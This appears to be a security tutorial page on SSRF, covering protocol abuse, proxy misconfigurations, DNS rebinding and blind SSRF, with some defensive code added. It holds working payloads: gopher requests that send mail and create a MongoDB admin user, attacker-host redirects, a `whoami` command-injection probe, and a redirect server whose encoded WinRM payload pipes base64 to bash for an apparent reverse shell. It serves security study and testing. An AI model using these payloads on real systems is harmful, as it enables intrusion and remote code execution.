SSRF (Server Side Request Forgery)

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

A Server-side Request Forgery (SSRF) vulnerability occurs when an attacker abuses a server-side application to make it send HTTP requests to a domain of the attacker's choosing. The vulnerability exposes the server to external requests directed by the attacker.

Capture SSRF

The first thing you need to do is capture an SSRF interaction that you caused. To capture an HTTP or DNS interaction you can use tools such as:

Whitelisted Domains Bypass

Usually you will find that the SSRF only works on certain whitelisted domains or URLs. The following page contains a compilation of techniques to try to bypass that whitelist:

URL Format Bypass

Bypass via open redirect

If the server is properly protected you may be able to bypass all the restrictions by exploiting an Open Redirect inside the web page. Because the web page allows SSRF to the same domain and will probably follow redirects, you can exploit the Open Redirect to make the server access any internal resource.
Read more here: https://portswigger.net/web-security/ssrf

Protocols

  • file://: The file:// URL scheme is referenced, pointing directly to /etc/passwd: file:///etc/passwd
  • dict://: The DICT URL scheme is described as being used to access definitions or word lists through the DICT protocol. The example shows a constructed URL targeting a specific word, database and entry number, along with an instance of a PHP script that could be abused to connect to a DICT server using attacker-supplied credentials: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
  • SFTP://: Identified as a secure file transfer protocol over secure shell; an example shows how a PHP script could be exploited to connect to a malicious SFTP server: url=sftp://generic.com:11111/
  • TFTP://: Trivial File Transfer Protocol, working over UDP, is mentioned with an example of a PHP script designed to send a request to a TFTP server. A TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
  • LDAP://: This section covers the Lightweight Directory Access Protocol, highlighting its use for managing and accessing distributed directory information services over IP networks. Interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
  • SMTP: A technique is described for exploiting SSRF vulnerabilities to interact with SMTP services on localhost, including steps to disclose internal domain names and further investigation steps based on that information.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
3. search http://internaldomain.com on github, find subdomains
4. connect
  • Curl URL globbing - WAF bypass: If the SSRF is executed by curl, curl has a feature called URL globbing that could be useful to bypass WAFs. For example in this writeup you can find this example of path traversal via the file protocol:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • Gopher://: The Gopher protocol's ability to specify IP, port and bytes for communication with a server is discussed, along with tools like Gopherus and remote-method-guesser to create payloads. Two distinct uses are illustrated:

Gopher://

Using this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically exploit a SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — Back connect to 1337

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>

Now query it:
https://example.com/?q=http://evil.com/redirect.php

Gopher MongoDB – Create a user with username=admin, password=admin123 and permission=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%07%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00%00%00administrator%00%00%00%00'

SSRF via Referrer header & Others

Analytics software on servers often logs the Referrer header to track incoming links, a practice that inadvertently exposes applications to Server-Side Request Forgery (SSRF) vulnerabilities. This is because such software may visit external URLs mentioned in the Referrer header to analyse the content of referring sites. To uncover these vulnerabilities, the Burp Suite plugin "Collaborator Everywhere" is recommended; it leverages the way analytics tools process the Referer header to identify potential SSRF attack surfaces.

SSRF via SNI data from certificate

A misconfiguration that could enable a connection to any backend through a simple setup is illustrated with an example Nginx configuration:

stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}

In this configuration, the value from the Server Name Indication (SNI) field is used directly as the backend address. This setup exposes a Server-Side Request Forgery (SSRF) vulnerability, which can be exploited simply by specifying the desired IP address or domain name in the SNI field. An example of exploitation to force a connection to an arbitrary backend, such as internal.host.com, using the openssl command, is shown below:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
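A hardened version of the same stream block, added here as an example (not from the original page): the SNI name is looked up in an explicit map instead of being used as the upstream address, so a client-chosen name cannot select an arbitrary backend. The backend names are placeholders.

```nginx
stream {
    # Only the listed SNI names map to a backend; anything else yields an
    # empty upstream, which nginx cannot connect to, so the connection is closed.
    # Host names are placeholders.
    map $ssl_preread_server_name $backend {
        hostnames;
        app.example.com   app-backend.internal:443;
        api.example.com   api-backend.internal:443;
        default           "";
    }

    server {
        listen 443;
        resolver 127.0.0.11;
        ssl_preread on;
        # Client-supplied SNI no longer reaches proxy_pass directly.
        proxy_pass $backend;
    }
}
```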

SSRF via TLS AIA CA Issuers (Java mTLS)

Some TLS stacks can automatically download missing intermediate CAs using the Authority Information Access (AIA) → CA Issuers URI inside the peer certificate. In Java, enabling -Dcom.sun.security.enableAIAcaIssuers=true while running an mTLS service causes the server to dereference attacker-controlled URIs from the client certificate during the handshake, before any HTTP logic runs.

  • Requirements: mTLS enabled, Java AIA fetching enabled, and the attacker can present a client certificate with a crafted AIA CA Issuers URI.
  • Triggering the SSRF (Java 21 example):
java -Djava.security.debug=certpath \
-Dcom.sun.security.enableAIAcaIssuers=true \
-Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem

Java's certpath debug output shows CertStore URI:http://localhost:8080, and nc captures an HTTP request whose User-Agent is controllable via -Dhttp.agent, confirming SSRF during certificate validation.

  • DoS via file://: setting the AIA CA Issuers to file:///dev/urandom on Unix-like hosts makes Java treat it as a CertStore and read unbounded random bytes, pegging a CPU core and blocking subsequent connections even after the client disconnects.

SSRF via CSS Pre-Processors

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation the LESS engine fetches the resources referenced in @import statements and inlines their contents into the resulting CSS when the (inline) option is used.

Check how to exploit it in:

LESS Code Injection

Wget file upload

SSRF with Command Injection

It could be worth trying a payload like: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFs Rendering

If the web page automatically creates a PDF with information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF, and you will be able to abuse a SSRF. Find more information here.

From SSRF to DoS

Create several sessions and try to download heavy files abusing the SSRF from those sessions.

SSRF PHP Functions

Check the following page for vulnerable PHP and even Wordpress functions:

PHP SSRF

SSRF Redirect to Gopher

For some exploitations you may need to send a redirect response (probably to use a different protocol like gopher). Here you have different python codes to respond with a redirect:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)
        # The Location value is the page's encoded gopher payload; Python joins the
        # adjacent string literals below into one URL.
        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%"
                                     "20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c"
                                     "%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
        self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile="server.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

Flask variant (ssl_context='adhoc' requires the pyOpenSSL package):

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
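An added defender-side example (not code from the original page) covering the protocol list, the open-redirect bypass and the redirect-to-gopher trick above: a fetcher that allows only http(s), rejects userinfo, resolves the host and refuses non-public addresses, and repeats those checks on every redirect hop while following only the standard redirect codes. The resolver and the responses are constructed so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}      # no gopher://, file://, dict://, ldap:// ...
FOLLOWABLE = {301, 302, 303, 307, 308}   # 305/306/309/310 are handed back, never followed
MAX_HOPS = 3

class UnsafeURL(ValueError):
    """Raised for any URL, or redirect hop, that must not be fetched."""

def is_public_ip(ip_str):
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped               # ::ffff:127.0.0.1 is still loopback
    return ip.is_global and not ip.is_multicast

def validate_url(url, resolve=socket.gethostbyname):
    """Return (host, ip, port) if url is safe to fetch, else raise UnsafeURL."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} not allowed")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo in URL")  # rejects the @host confusion outright
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        raise UnsafeURL("bad port") from None
    try:
        ip = resolve(host)                # hex/decimal/IPv6 literals normalise here
    except (OSError, ValueError) as exc:
        raise UnsafeURL(f"cannot resolve {host}") from exc
    if not is_public_ip(ip):
        raise UnsafeURL(f"{host} resolves to non-public {ip}")
    return host, ip, port

def safe_fetch(url, fetch, resolve=socket.gethostbyname):
    """fetch(url, ip) -> (status, location_or_body); fetch must connect to the given
    ip (Host set to the name) so a re-lookup cannot be rebound after the check."""
    for _ in range(MAX_HOPS + 1):
        host, ip, _port = validate_url(url, resolve)
        status, value = fetch(url, ip)
        if status not in FOLLOWABLE:
            return status, value
        url = urljoin(url, value)         # Location may be relative
    raise UnsafeURL("too many redirects")

# --- constructed resolver and responses so the example runs with no network ---
SAMPLE_DNS = {"example.com": "93.184.216.34", "intranet.corp": "10.0.0.5"}

def sample_resolve(host):
    try:
        ipaddress.ip_address(host)        # an IP literal resolves to itself
        return host
    except ValueError:
        pass
    if host in SAMPLE_DNS:
        return SAMPLE_DNS[host]
    raise socket.gaierror(-2, f"no such host: {host}")

SAMPLE_RESPONSES = {
    "https://example.com/a":     (302, "/b"),
    "https://example.com/b":     (200, "hello"),
    "https://example.com/meta":  (302, "http://169.254.169.254/"),
    "https://example.com/goph":  (301, "gopher://127.0.0.1:25/_HELO"),
    "https://example.com/weird": (305, "/b"),
    "https://example.com/loop":  (302, "/loop"),
}

def classify(url):
    """'ok:<status>' when the fetch completed, 'blocked:<reason>' when stopped."""
    try:
        status, _ = safe_fetch(url, lambda u, ip: SAMPLE_RESPONSES.get(u, (404, "")),
                               sample_resolve)
        return f"ok:{status}"
    except UnsafeURL as exc:
        return f"blocked:{exc}"
```

A 305 is returned to the caller unfollowed rather than treated as an error, which is what stops the status-code trick described further down this page.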

Misconfigured proxies to SSRF

Tricks from this post.

Flask

Flask proxy vulnerable code:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # the user-supplied path is appended to the upstream URL without validation
    return get(f'{SITE_NAME}{path}').content

if __name__ == "__main__":
    app.run(threaded=False)

Flask allows using @ as the initial character, which turns the original hostname into the username and injects a new one. Attack request:

GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Vulnerable code:

It was discovered that it is possible to start the request path with the character ;, which then allows using @ and injecting a new host to reach. Attack request:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server

Vulnerable PHP code:

<?php
// The upstream site and the incoming request URI; the page omits their
// definitions, so these two lines are assumed for the snippet to run
$site = "https://example.com";
$current_uri = $_SERVER['REQUEST_URI'];

$proxy_site = $site.$current_uri;
var_dump($proxy_site);

echo "\n\n";

$response = file_get_contents($proxy_site);
var_dump($response);
?>

PHP allows the use of the char * before the slash in the path of the URL; however, it has other limitations, such as that it can only be used for the root pathname / and that dots . are not allowed before the first slash, so a hex-encoded IP address without dots is needed, for example:

GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

Reverse proxies that accept absolute URLs in the request line (open forward-proxy)

Some reverse proxies also accept absolute-form request lines (GET http://10.0.0.5:8080/path HTTP/1.1) and forward the URL as-is to the backend instead of rejecting it or rewriting it to the configured upstream. This turns the reverse proxy into a pre-auth forward proxy with full-read SSRF, including access to services bound to localhost that would normally be unreachable from the Internet.

Key points:

  • Request line controls destination: the authority in the absolute URL overrides normal routing; the Host header is usually ignored.
  • Full response returned: responses from internal hosts are streamed back, so you can enumerate and interact (e.g. SOAP/Axis2, Keycloak, admin consoles) instead of blind-probing.
  • Works on localhost: GET http://127.0.0.1:port/ HTTP/1.1\r\nHost: public-host\r\n\r\n is enough to reach loopback-only listeners.
  • Abuse as pivot: combine with other vulns (e.g. upload endpoints) to reach intra-host services.

Minimal probe:

GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close

If you see the upstream's response instead of a 400, the appliance is acting as an open proxy.
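Added example, not from the original page: the check a reverse proxy or WAF should apply to the request-target before building an upstream URL, run over constructed request lines that include the @, ;@, *@hex and absolute-form shapes discussed in this and the previous sections.

```python
import ipaddress
import re
from urllib.parse import urlsplit

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d(?:\.\d)?$")
OBFUSCATED_HOST = re.compile(r"@(0x[0-9a-f]+|\d{8,})", re.IGNORECASE)

def request_target_findings(request_line):
    """Return the reasons a request line must not be forwarded verbatim
    (an empty list means a plain origin-form target such as GET /x)."""
    m = REQUEST_LINE.match(request_line.rstrip("\r\n"))
    if not m:
        return ["malformed request line"]
    method, target = m.groups()
    if method == "CONNECT":
        return ["CONNECT tunnel request"]
    if target == "*":
        return [] if method == "OPTIONS" else ["asterisk-form is only valid for OPTIONS"]
    path = target.split("?", 1)[0]
    findings = []
    if "://" in path:
        # absolute-form: the request line, not the proxy config, names the upstream
        findings.append("absolute-form target selects its own upstream")
        host = urlsplit(target).hostname or ""
        try:
            if not ipaddress.ip_address(host).is_global:
                findings.append(f"absolute-form target points at non-public {host}")
        except ValueError:
            pass   # a DNS name: resolve it and check the address before connecting
        return findings
    if not path.startswith("/"):
        findings.append("origin-form target must start with '/'")
    if "@" in path:
        findings.append("'@' in path: configured upstream host becomes userinfo")
    if OBFUSCATED_HOST.search(path):
        findings.append("obfuscated IP literal after '@'")
    return findings

# constructed sample request lines, including the shapes discussed above
SAMPLE_REQUEST_LINES = [
    "GET /index.html HTTP/1.1",
    "GET @evildomain.com/ HTTP/1.1",
    "GET ;@evil.com/url HTTP/1.1",
    "GET *@0xa9fea9fe/ HTTP/1.1",
    "GET http://127.0.0.1:8080/ HTTP/1.1",
    "OPTIONS * HTTP/1.1",
    "CONNECT 10.0.0.5:22 HTTP/1.1",
]

def scan(request_lines):
    """Return [(line, findings)] for every line that has at least one finding."""
    return [(line, f) for line in request_lines if (f := request_target_findings(line))]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUEST_LINES):
        print(line, "->", "; ".join(findings))
```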

DNS Rebinding CORS/SOP bypass

If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:

CORS - Misconfigurations & Bypass

Automated DNS Rebinding

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the components necessary to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

Check out also the publicly running server at http://rebind.it/singularity.html

DNS Rebinding + TLS Session ID/Session ticket

Requirements:

  • SSRF
  • Outbound TLS sessions
  • Stuff on local ports

Attack:

  1. Ask the user/bot to access a domain controlled by the attacker
  2. The DNS TTL is 0 sec (so the victim will look up the domain's IP again soon)
  3. A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
  4. The domain starts an infinite loop of redirects against itself. The goal is to make the user/bot access the domain until it performs another DNS request for the domain.
  5. In the DNS request a private IP is now given (127.0.0.1 for example)
  6. The user/bot will try to re-establish the TLS connection and in order to do so it will send the Session ID/Ticket ID (where the attacker's payload was contained). So congratulations: you managed to make the user/bot attack itself.

Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

The difference between a blind SSRF and a non-blind one is that in the blind case you cannot see the response of the SSRF request. It is therefore harder to exploit, because you will only be able to exploit well-known vulnerabilities.

Time based SSRF

By checking the timing of the responses from the server it might be possible to know whether a resource exists or not (it may take longer to access an existing resource than to access one that does not exist).

From blind to full by abusing status codes

According to the blog post, some blind SSRFs occur because even though the targeted URL returns a 200 status code (like AWS metadata), the data is not in the expected format and therefore the app may refuse to show it.

However, it was found that sending redirect responses from 305 to 309 in the SSRF could make the app follow those redirects while entering an error mode in which it no longer reformats the data and simply prints it.

The python server used to exploit this is the following:

from flask import Flask, redirect, request

app = Flask(__name__)
# the page only names the metadata host; the path is a placeholder
METADATA_URL = "http://169.254.169.254/"

@app.route("/redir")
def redir():
    count = int(request.args.get("count", 0)) + 1
    # Pump out 305, 306, 307, 308, 309, 310 ...
    weird_status = 301 + count
    if count >= 10:                      # after 5 "weird" codes
        return redirect(METADATA_URL, 302)
    return redirect(f"/redir?count={count}", weird_status)

@app.route("/start")
def start():
    return redirect("/redir", 302)

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080)

Steps:

  • The first 302 makes the app start following.
  • Then it gets 305 → 306 → 307 → 308 → 309 → 310.
  • After the 5th weird code the PoC finally returns 302 → 169.254.169.254 → 200 OK.

What happens inside the target:

  • libcurl itself follows 305–310; it turns unknown codes into "follow".
  • After N weird redirects (≥ 5 here) the application's own wrapper decides "something is off" and enters an error mode meant for debugging.
  • In that mode it dumps the whole redirect chain plus the final body and returns it to the outside caller.
  • Result: the attacker sees every header + the metadata JSON, mission accomplished.

Note that this is interesting for leaking status codes that you could not leak before (like 200). However, if you can somehow also choose the status code of the response (imagine you can decide that the AWS metadata responds with status code 500), there might be status codes that directly leak the contents of the response.

HTML-to-PDF renderers as blind SSRF gadgets

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

<html>
  <body>
    <img width="1" height="1" src="http://127.0.0.1:8080/healthz">
    <link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
  </body>
</html>

  • TCPDF 6.10.0 issues several fetch attempts for each <img> resource, so a single payload can generate many requests (useful for timing-based port scans).
